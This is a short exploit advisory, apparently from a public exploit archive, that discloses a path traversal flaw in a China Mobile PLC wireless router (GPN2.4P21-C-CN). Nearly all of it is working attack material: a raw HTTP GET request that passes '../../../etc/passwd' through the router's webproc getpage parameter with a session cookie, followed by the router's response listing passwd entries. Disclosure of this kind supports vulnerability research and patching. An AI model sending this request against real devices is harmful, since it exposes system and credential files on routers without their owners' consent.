34 lines
No EOL
1 KiB
Text
34 lines
No EOL
1 KiB
Text
# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN Authorised Arbitrary File Disclosure
|
|
# Date: 28/08/2016
|
|
# Exploit Author: Rahul Raz
|
|
# Affected Model : GPN2.4P21-C-CN(Frimware- W2001EN-00
|
|
#Vendor: ChinaMobile
|
|
# Tested on: Ubuntu Linux
|
|
_____________________________________________________
|
|
|
|
GET
|
|
/cgi-bin/webproc?getpage=../../../etc/passwd&var:language=en_us&var:menu=setup&var:page=connected
|
|
Host: 192.168.59.254
|
|
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101
|
|
Firefox/48.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Cookie: sessionid=64857d81
|
|
Connection: keep-alive
|
|
|
|
Response
|
|
HTTP/1.0 200 OK
|
|
Connection: close
|
|
Content-Type: text/html
|
|
Pragma: no-cache
|
|
Cache-Control: no-cache
|
|
Set-Cookie: sessionid=64857d81; expires=Fri, 31-Dec-9999 23:59:59 GMT;
|
|
path=/
|
|
|
|
|
|
#root:x:0:0:root:/root:/bin/bash
|
|
#root:x:0:0:root:/root:/bin/sh
|
|
#root:x:0:0:root:/root:/usr/bin/cmd
|
|
#tw:x:504:504::/home/tw:/bin/bash
|
|
#tw:x:504:504::/home/tw:/bin/msh |